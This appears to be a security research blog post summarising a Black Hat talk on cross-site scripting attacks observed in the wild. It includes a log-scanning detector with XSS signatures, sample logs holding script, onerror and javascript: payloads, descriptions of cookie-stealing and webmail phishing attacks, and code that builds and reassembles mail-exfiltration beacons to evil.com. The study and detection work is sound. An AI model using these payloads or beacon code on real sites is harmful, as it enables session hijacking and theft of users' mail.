For those of you who were not able to make it to our talk at Blackhat USA, this blog post provides an overview of the information presented. This was a joint presentation by Trustwave SpiderLabs Research Team and Microsoft's Security Research and Defense Team.
This is Part 1 of a two-part blog post. In this installment, we discuss example XSS attacks captured in the wild along with some statistics. In Part 2, we will discuss XSS defense techniques.
XSS: Vulnerability Prevalence
OWASP Top 10 2013
As the OWASP Top 10 2013 graphic shows, the PREVALENCE of XSS across all applications tested is rated VERY WIDESPREAD.
Trustwave Global Security Report
In the latest Trustwave Global Security Report, the SpiderLabs App-Pentest Team generated the following list of the top vulnerabilities identified during their engagements in the last year:
XSS: Attack Likelihood
The previous section provided metrics supporting what we already know: XSS vulnerabilities are rampant. What we wanted to focus on in our research was this: HOW are XSS vulnerabilities being exploited in the wild?
XSS Attack Data Sources
In order to find real-world attack data, we analyzed a variety of resources:
- Web server/proxy logs
- Web application firewall logs
- URL shortening services
- Spam e-mails
- Chat rooms, IRC traffic
- Comments on pages
- URL reputation services
All of this data together yielded approximately:
- 100s TB of raw data
- 10s TB of URLs
XSS Attack Data Analysis
So, how did we analyze this data for XSS attacks? Greg created a toolset called detectXSSlib:
- General purpose library written in C
- Based on a subset of OWASP CRS rules (the IE XSS Filter-derived rules)
- Optimized for performance
- Rules selected on the base of empirical data
- Command line tool provided (xssscan)
- Easy to integrate with other components
- nginx module PoC provided
```
# ./xssscan
xssscan ver 1.0 (c) 2013 Greg Wroblewski
Command line tool for detection of XSS attacks in URLs.
Based on ModSecurity rules from OWASP CRS.
Optimized for performance and large scale data mining.

Usage:
  xssscan [-t] [-r] [-x] <URL>
  xssscan [-a] [-d] [-r] [-x] -f <TEXT_FILE_WITH_URLS>

Options:
  -a - in output replace host names with www.example.com
  -d - deduplicate URLs by same host name
  -r - show rule number for detected XSS (for statistics or debugging)
  -t - show tokens of parsed URL (useful for debugging only)
  -x - list only URLs where XSS was not detected (default: was detected)

# ./xssscan -f /var/log/apache2/access.log
172.16.209.1 - - [24/Jul/2013:10:40:40 -0400] "GET /wordpress/?s=%3Cscript%3Eprompt%28%22TEST%22%29%3B%3C%2Fscript%3E HTTP/1.1" 200 2155 "http://172.16.209.131/wordpress/?s=%3Cimg+src%3D1+onerror%3Dalert%28%27XSS%27%29%3E" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0"
```
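To make the approach concrete, here is an added example (written for this post, not detectXSSlib's own code) that does on a small scale what xssscan does on terabytes: parse Apache/nginx combined-format log lines, pull out the request target and the Referer, URL-decode them (repeatedly, so double-encoded payloads surface), and run a few XSS signatures over the result. The signatures and their names are simplified stand-ins for the CRS rules, not the real regexes. The first sample log line is the one from the xssscan run above; the other three are constructed.

```python
import re
import urllib.parse

# Illustrative signatures, written for this post, in the spirit of the OWASP
# CRS XSS rule set that detectXSSlib borrows from. They are NOT the CRS
# regexes and the rule names are made up; the real rules are far broader.
XSS_RULES = [
    ("script-tag",     re.compile(r"<\s*script\b", re.I)),
    ("event-handler",  re.compile(r"<[^>]+\bon[a-z]+\s*=", re.I)),
    ("js-uri",         re.compile(r"javascript\s*:", re.I)),
    ("iframe-object",  re.compile(r"<\s*(iframe|object|embed)\b", re.I)),
    ("css-expression", re.compile(r"expression\s*\(", re.I)),
]

# Apache/nginx "combined" log line: we need client, request target and Referer.
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)(?: \S+)?" (?P<status>\d{3}) \S+ '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)

def normalize(value, rounds=3):
    """URL-decode repeatedly (bounded) so double-encoded payloads are seen
    decoded. CRS achieves the same with its urlDecodeUni transformation."""
    for _ in range(rounds):
        decoded = urllib.parse.unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def scan_url(url):
    """Return the names of the rules that fire on the path or query of url."""
    parts = urllib.parse.urlsplit(url)
    candidates = [normalize(v) for _, v in
                  urllib.parse.parse_qsl(parts.query, keep_blank_values=True)]
    # Also scan the whole decoded query and the path: a payload split across
    # two parameters, or placed in the path, would otherwise be missed.
    candidates += [normalize(parts.query), normalize(parts.path)]
    return [name for name, rx in XSS_RULES
            if any(rx.search(c) for c in candidates)]

def scan_log(lines):
    """Return (client, field, url, rules) for every URL in lines that trips a
    rule. The Referer is scanned as well as the request target because a
    reflected payload often shows up there on the victim's next request."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        for field in ("target", "referer"):
            url = m.group(field)
            if url in ("", "-"):
                continue
            rules = scan_url(url)
            if rules:
                findings.append((m.group("host"), field, url, rules))
    return findings

# Constructed sample log. The first line is the one shown in the xssscan run
# above; the other three are made up to show a clean request, a double-encoded
# payload and a javascript: URI.
SAMPLE_LOG = [
    '172.16.209.1 - - [24/Jul/2013:10:40:40 -0400] "GET /wordpress/?s=%3Cscript%3Eprompt%28%22TEST%22%29%3B%3C%2Fscript%3E HTTP/1.1" 200 2155 "http://172.16.209.131/wordpress/?s=%3Cimg+src%3D1+onerror%3Dalert%28%27XSS%27%29%3E" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.8; rv:22.0) Gecko/20100101 Firefox/22.0"',
    '10.0.0.5 - - [24/Jul/2013:10:41:02 -0400] "GET /wordpress/?s=hello+world HTTP/1.1" 200 2155 "-" "curl/7.30.0"',
    '10.0.0.9 - - [24/Jul/2013:10:42:17 -0400] "GET /wordpress/?s=%253Cscript%253Ealert(1)%253C%252Fscript%253E HTTP/1.1" 200 2155 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [24/Jul/2013:10:42:30 -0400] "GET /redirect?url=javascript%3Aalert%28document.cookie%29 HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for client, field, url, rules in scan_log(SAMPLE_LOG):
        print(f"{client} {field:7} {','.join(rules):15} {url}")
```

On the sample log this reports two findings for the first line (the script tag in the request and the img/onerror payload in the Referer), nothing for the clean search, and one finding each for the double-encoded and javascript: lines. The bounded decode loop is the important detail: a single decode pass would have reported the third line as clean.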
Sanitized Example Attack Data
XSS Attack Examples: Proof-of-Concept Testing
- Scanning tools
- Going after bug bounty
- Internal testing
XSS Attack Examples: Defacements
Website defacements were another popular use of XSS vulnerabilities. Here is an example attack payload:
XSS Attack Examples: Cookie Stealing
This is the first XSS attack category that directly negatively impacts web application users. Here is an example attack payload:
In line #1, the attacker sends the XSS payload in a parameter that overrides the Referer data echoed back in the response, so that JS code executes. This code instructs the browser to download the wwgw8k5srago.js file. That file contains the code in line #2, which instructs the browser to make a request to the nwwgw8k5sra.gif URL and to pass the document.cookie DOM data as a parameter. If this attack is successful, the attacker can quickly use the application SessionID cookie value to log into the application as the victim user.
XSS Attack Examples: In-Session Phishing
***This example uses an XSS vulnerability in Hotmail that has since been fixed.***
If attackers can identify XSS vulnerabilities within web-based email providers, then they can send targeted Phishing emails to users. Take a look at the example exploit code:
In this instance, if I was logged into Hotmail and received the Phishing email, the JS code would fire from the onerror event handler and issue a jQuery call to the attacker's site, which would present me with the following fake login page:
If the victim falls for this attack, their credentials are sent to the attacker's site. We have seen at least 10 different instances of this type of attack, usually launched against e-mail providers and financial institutions, and very often carefully prepared with localized login screens, well-concealed password delivery servers, etc.
XSS Attack Examples: Data Exfiltration
In one case, the script we saw had 10s of kB of code, and even included interesting left-over comments. How nice.
The script was able to enumerate multiple pages of a mailbox, extract e-mail data including attachments, and also steal the contact list. Specifically, the script was able to:
- Enumerate through last 60 pages worth of e-mail
- Extract the From, Subject, and Body of the e-mail by using the same calls as would be triggered if user were to view the e-mails
- Inject new script elements with source set to the URL containing the next chunk of the data read from the file.
- Send data in chunks to http://evil.com/hotmail_xss.php?u=<email>&msg=<subject+from>^^<segment index>^^<next segment of message body>
- Fetch content off of inbox/sent/drafts.
- Clean up : mark messages that were not originally read as unread
The upload process was also not trivial, leveraging data chunking.
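Because the beacon format above is documented precisely, an analyst who finds those requests in proxy logs can put the stolen mail back together. The following added example (written for this post; not code from the attack script or from the authors) builds beacons in that format for a constructed message, then reassembles them from an out-of-order, partially duplicated capture, reporting any missing segments. The host evil.com and path are the ones quoted above; the mailbox owner, sender, subject, body and the 40-character segment size are assumptions.

```python
import urllib.parse
from collections import defaultdict

EXFIL_ENDPOINT = "http://evil.com/hotmail_xss.php"   # endpoint quoted in the post
SEP = "^^"                                           # field separator from the post

def chunk(text, size):
    """Split text into fixed-size segments; the last one may be shorter."""
    return [text[i:i + size] for i in range(0, len(text), size)]

def build_beacons(user, subject_from, body, size=40):
    """Attacker side: one GET URL per body segment, in the documented
    u=<email>&msg=<subject+from>^^<index>^^<segment> format. Returned in
    index order; on the wire they may be logged in any order."""
    urls = []
    for idx, seg in enumerate(chunk(body, size)):
        msg = SEP.join([subject_from, str(idx), seg])
        query = urllib.parse.urlencode({"u": user, "msg": msg})
        urls.append(f"{EXFIL_ENDPOINT}?{query}")
    return urls

def parse_beacon(url):
    """Defender side: extract (user, subject_from, index, segment) from one
    logged URL, or None if it does not match the format."""
    parts = urllib.parse.urlsplit(url)
    if not parts.path.endswith("/hotmail_xss.php"):
        return None
    q = dict(urllib.parse.parse_qsl(parts.query, keep_blank_values=True))
    if "u" not in q or "msg" not in q:
        return None
    fields = q["msg"].split(SEP, 2)   # maxsplit: the segment itself may contain "^^"
    if len(fields) != 3 or not fields[1].isdigit():
        return None
    return q["u"], fields[0], int(fields[1]), fields[2]

def reassemble(urls):
    """Group beacons per (user, subject_from), order by segment index and
    rebuild each body. Duplicate segments collapse; gaps are reported so the
    analyst knows a reconstruction is partial."""
    segments = defaultdict(dict)
    for url in urls:
        parsed = parse_beacon(url)
        if parsed is None:
            continue
        user, subj, idx, seg = parsed
        segments[(user, subj)][idx] = seg
    result = {}
    for key, segs in segments.items():
        expected = range(max(segs) + 1)
        missing = [i for i in expected if i not in segs]
        body = "".join(segs[i] for i in expected if i in segs)
        result[key] = {"body": body, "missing": missing}
    return result

# Constructed sample message (assumed, not observed data).
SAMPLE_USER = "alice@example.com"
SAMPLE_SUBJECT_FROM = "Q3 numbers | bob@example.com"
SAMPLE_BODY = ("Attached are the figures for the board meeting on Friday. "
               "Please keep them internal until the call. Thanks, Bob")

def demo():
    """Simulate a proxy capture: beacons logged in reverse order, one segment
    retransmitted, plus an unrelated hit on the same endpoint."""
    beacons = build_beacons(SAMPLE_USER, SAMPLE_SUBJECT_FROM, SAMPLE_BODY, size=40)
    observed = list(reversed(beacons)) + beacons[1:2]
    observed.append(EXFIL_ENDPOINT + "?u=alice%40example.com&msg=garbage")
    return reassemble(observed)

if __name__ == "__main__":
    for (user, subj), rec in demo().items():
        print(f"{user} | {subj} | missing={rec['missing']}\n{rec['body']}")
```

The same reassembly works when segments are missing: drop a beacon from the capture and the record for that message carries the missing index, while the body is rebuilt from whatever did arrive. Note that reassembly only needs URLs, so a web proxy or DNS/HTTP egress log is enough; no access to the attacker's server is required.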
# of Successful XSS Attacks per TLD
We have seen at least one sample of a working attack for almost every TLD out there.
Successful XSS Attacks Over Time
The intensity of attacks remained at a constant level over the period in which we were able to monitor them consistently.
Prevalence of XSS Attacks (based on Alexa Top N list)
Well over 6% of the top 1,000 websites had a successful XSS attack.
Part 1 Conclusion
As we have outlined in Part 1 of this blog post, XSS attacks are real. Their severity and impact depend on what your business model is and who your customers are; however, outcomes such as account hijacking and data exfiltration are serious issues for anyone.
How do we protect against XSS attacks? Stay tuned for Part 2 where I will provide an overview of tactical XSS defenses which can be used in production to help mitigate exposures.